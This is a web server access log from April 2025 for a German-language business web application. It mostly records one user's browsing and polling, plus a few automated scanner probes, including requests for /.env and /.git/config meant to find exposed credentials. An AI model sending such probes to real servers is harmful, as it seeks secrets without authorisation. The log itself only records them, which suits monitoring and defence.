77.119.161.159 - - [23/Apr/2025:11:53:04 +0200] "GET /gui/images/icons/verwaltung_automarken.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:53:05 +0200] "GET /gui/images/icons/menumanagement.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:53:05 +0200] "GET /gui/images/icons/artikelbearbeitung_verfassung.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:54:04 +0200] "GET /entry.php?id=10271&&ser=401984 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:54:05 +0200] "GET /gui/javascript/form_form.js?1745402044 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=401984" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:55:06 +0200] "GET /entry.php?id=10271&&ser=402044 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=401984" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:55:06 +0200] "GET /gui/javascript/form_form.js?1745402106 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=402044" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:55:24 +0200] "GET /entry.php?id=10828 HTTP/1.1" 200 9139 "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:55:24 +0200] "GET /gui/javascript/form_form.js?1745402124 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:55:25 +0200] "GET /entry.php?id=10889&document_id=& HTTP/1.1" 200 1508 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:55:25 +0200] "GET /gui/javascript/form_form.js?1745402125 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10889&document_id=&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:55:29 +0200] "GET /entry.php?id=11237&type=10665 HTTP/1.1" 200 276 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:55:29 +0200] "GET /entry.php?id=10676&&title=Belegsuche HTTP/1.1" 200 1389 "http://hausegger.activities.at/entry.php?id=11237&type=10665" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:55:29 +0200] "GET /gui/javascript/form_form.js?1745402129 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10676&&title=Belegsuche" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:55:29 +0200] "GET /entry.php?id=11239&mode=document&form=10665& HTTP/1.1" 200 2016 "http://hausegger.activities.at/entry.php?id=11237&type=10665" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:55:30 +0200] "GET /gui/javascript/form_bu_document_workflow.js?1745402130 HTTP/1.1" 200 4900 "http://hausegger.activities.at/entry.php?id=11239&mode=document&form=10665&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:55:30 +0200] "GET /gui/javascript/form_form.js?1745402130 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=11239&mode=document&form=10665&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:55:29 +0200] "GET /entry.php?id=11238&mode=document&form=10665& HTTP/1.1" 200 3302 "http://hausegger.activities.at/entry.php?id=11237&type=10665" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:55:30 +0200] "GET /gui/images/icons/kalender.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=11238&mode=document&form=10665&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:55:29 +0200] "GET /entry.php?id=11240&mode=document&form=10665& HTTP/1.1" 200 2663 "http://hausegger.activities.at/entry.php?id=11237&type=10665" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:55:30 +0200] "GET /entry.php?id=10776&form=11066&name=list& HTTP/1.1" 200 1513 "http://hausegger.activities.at/entry.php?id=11240&mode=document&form=10665&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:55:30 +0200] "GET /entry.php?id=10778&form=11066&name=list& HTTP/1.1" 200 2586 "http://hausegger.activities.at/entry.php?id=11240&mode=document&form=10665&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:55:31 +0200] "POST /entry.php?id=11240 HTTP/1.1" 200 2671 "http://hausegger.activities.at/entry.php?id=11240&mode=document&form=10665&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:55:32 +0200] "GET /gui/javascript/form_bu_document_workflow.js?1745402132 HTTP/1.1" 200 4900 "http://hausegger.activities.at/entry.php?id=11240" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:55:32 +0200] "GET /gui/javascript/form_form.js?1745402132 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=11240" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:55:32 +0200] "GET /entry.php?id=10776&form=11066&name=list& HTTP/1.1" 200 1513 "http://hausegger.activities.at/entry.php?id=11240" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:55:32 +0200] "GET /entry.php?id=10778&form=11066&name=list& HTTP/1.1" 200 2903 "http://hausegger.activities.at/entry.php?id=11240" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:56:07 +0200] "GET /entry.php?id=10271&&ser=402106 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=402044" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:56:07 +0200] "GET /gui/javascript/form_form.js?1745402167 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=402106" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:57:07 +0200] "GET /entry.php?id=10271&&ser=402167 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=402106" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:57:07 +0200] "GET /gui/javascript/form_form.js?1745402227 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=402167" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:58:08 +0200] "GET /entry.php?id=10271&&ser=402227 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=402167" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:58:08 +0200] "GET /gui/javascript/form_form.js?1745402288 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=402227" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:59:09 +0200] "GET /entry.php?id=10271&&ser=402288 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=402227" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:59:09 +0200] "GET /gui/javascript/form_form.js?1745402349 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=402288" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:00:09 +0200] "GET /entry.php?id=10271&&ser=402349 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=402288" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:00:09 +0200] "GET /gui/javascript/form_form.js?1745402409 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=402349" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:01:10 +0200] "GET /entry.php?id=10271&&ser=402409 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=402349" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:01:10 +0200] "GET /gui/javascript/form_form.js?1745402470 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=402409" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:02:11 +0200] "GET /entry.php?id=10271&&ser=402470 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=402409" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:02:11 +0200] "GET /gui/javascript/form_form.js?1745402531 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=402470" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:03:11 +0200] "GET /entry.php?id=10271&&ser=402531 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=402470" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:03:11 +0200] "GET /gui/javascript/form_form.js?1745402591 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=402531" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:04:11 +0200] "GET /entry.php?id=10271&&ser=402591 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=402531" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:04:12 +0200] "GET /gui/javascript/form_form.js?1745402652 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=402591" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
47.128.24.137 - - [23/Apr/2025:12:04:27 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.112.183 - - [23/Apr/2025:12:04:46 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.57.172 - - [23/Apr/2025:12:05:02 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.38.116 - - [23/Apr/2025:12:05:11 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
77.119.161.159 - - [23/Apr/2025:12:05:12 +0200] "GET /entry.php?id=10271&&ser=402652 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=402591" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:05:12 +0200] "GET /gui/javascript/form_form.js?1745402712 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=402652" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
137.184.105.192 - - [23/Apr/2025:12:06:01 +0200] "GET /aaa9 HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x"
77.119.161.159 - - [23/Apr/2025:12:06:12 +0200] "GET /entry.php?id=10271&&ser=402712 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=402652" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:06:12 +0200] "GET /gui/javascript/form_form.js?1745402772 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=402712" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
137.184.105.192 - - [23/Apr/2025:12:06:17 +0200] "GET /aab8 HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x"
137.184.105.192 - - [23/Apr/2025:12:06:34 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
77.119.161.159 - - [23/Apr/2025:12:07:12 +0200] "GET /entry.php?id=10271&&ser=402772 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=402712" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:07:13 +0200] "GET /gui/javascript/form_form.js?1745402833 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=402772" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:08:13 +0200] "GET /entry.php?id=10271&&ser=402833 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=402772" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:08:13 +0200] "GET /gui/javascript/form_form.js?1745402893 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=402833" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:09:13 +0200] "GET /entry.php?id=10271&&ser=402893 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=402833" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:09:13 +0200] "GET /gui/javascript/form_form.js?1745402953 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=402893" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
192.241.169.86 - - [23/Apr/2025:12:09:16 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
192.241.169.86 - - [23/Apr/2025:12:09:16 +0200] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
77.119.161.159 - - [23/Apr/2025:12:10:13 +0200] "GET /entry.php?id=10271&&ser=402953 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=402893" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:10:14 +0200] "GET /gui/javascript/form_form.js?1745403014 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=402953" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
92.255.57.58 - - [23/Apr/2025:12:10:38 +0200] "\x16\x03\x01\x05\xa8\x01" 400 383 "-" "-"
77.119.161.159 - - [23/Apr/2025:12:11:14 +0200] "GET /entry.php?id=10271&&ser=403014 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=402953" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:11:14 +0200] "GET /gui/javascript/form_form.js?1745403074 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=403014" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
154.81.156.54 - - [23/Apr/2025:12:11:49 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
77.119.161.159 - - [23/Apr/2025:12:12:14 +0200] "GET /entry.php?id=10271&&ser=403074 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=403014" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:12:14 +0200] "GET /gui/javascript/form_form.js?1745403134 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=403074" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:13:14 +0200] "GET /entry.php?id=10271&&ser=403134 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=403074" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:13:15 +0200] "GET /gui/javascript/form_form.js?1745403194 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=403134" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:15:16 +0200] "GET /layout.php HTTP/1.1" 200 815 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:15:16 +0200] "GET /entry.php?id=10270 HTTP/1.1" 200 909 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:15:16 +0200] "GET /entry.php?id=10272 HTTP/1.1" 200 1159 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:15:16 +0200] "GET /entry.php?id=10273 HTTP/1.1" 200 1902 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:15:16 +0200] "GET /entry.php?id=11412 HTTP/1.1" 200 1759 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:15:16 +0200] "GET /gui/javascript/jquery/css/gui-themes/custom.min.css HTTP/1.1" 200 5618 "http://hausegger.activities.at/entry.php?id=10270" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:15:16 +0200] "GET /gui/javascript/jquery/css/gui-themes/jquery.tooltip.css HTTP/1.1" 200 246 "http://hausegger.activities.at/entry.php?id=10270" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:15:16 +0200] "GET /gui/javascript/jquery/css/gui-themes/ui.spinner.css HTTP/1.1" 200 350 "http://hausegger.activities.at/entry.php?id=10270" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:15:17 +0200] "GET /gui/styles/tmplDefault.css HTTP/1.1" 200 2135 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:15:16 +0200] "GET /gui/javascript/form_form.js?1745403316 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10270" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:15:17 +0200] "GET /framework/webfx/style/toolbar/cb2.css HTTP/1.1" 200 793 "http://hausegger.activities.at/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:15:17 +0200] "GET /gui/javascript/form_form.js?1745403316 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:15:17 +0200] "GET /gui/images/icons/cancel.gif HTTP/1.1" 200 125 "http://hausegger.activities.at/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:15:17 +0200] "GET /gui/javascript/form_form.js?1745403316 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:15:17 +0200] "GET /gui/javascript/form_form.js?1745403316 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:15:17 +0200] "GET /entry.php?id=10271& HTTP/1.1" 200 934 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:15:17 +0200] "GET /entry.php?id=10287 HTTP/1.1" 200 2419 "http://hausegger.activities.at/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:15:17 +0200] "GET /gui/javascript/form_form.js?1745403317 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:15:17 +0200] "GET /gui/images/emptybar.gif HTTP/1.1" 200 89 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:15:17 +0200] "GET /gui/javascript/form_form.js?1745403317 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:15:17 +0200] "GET /entry.php?id=10273& HTTP/1.1" 200 1903 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:15:17 +0200] "GET /entry.php?id=10270& HTTP/1.1" 200 909 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:15:23 +0200] "POST /entry.php?id=10287& HTTP/1.1" 200 1968 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:16:26 +0200] "GET /gui/javascript/form_form.js?1745403386 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:16:26 +0200] "GET /entry.php?id=10273& HTTP/1.1" 200 2012 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:16:26 +0200] "GET /framework/webfx/style/toolbar/images/cbback.gif HTTP/1.1" 404 318 "http://hausegger.activities.at/framework/webfx/style/toolbar/cb2.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:16:26 +0200] "GET /entry.php?id=10270&__app__=10006038 HTTP/1.1" 200 2231 "http://hausegger.activities.at/entry.php?id=10273&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:16:26 +0200] "GET /entry.php?id=10271& HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:16:26 +0200] "GET /undefined HTTP/1.1" 404 289 "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:12:17:26 +0200] "GET /entry.php?id=10271&&ser=403386 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
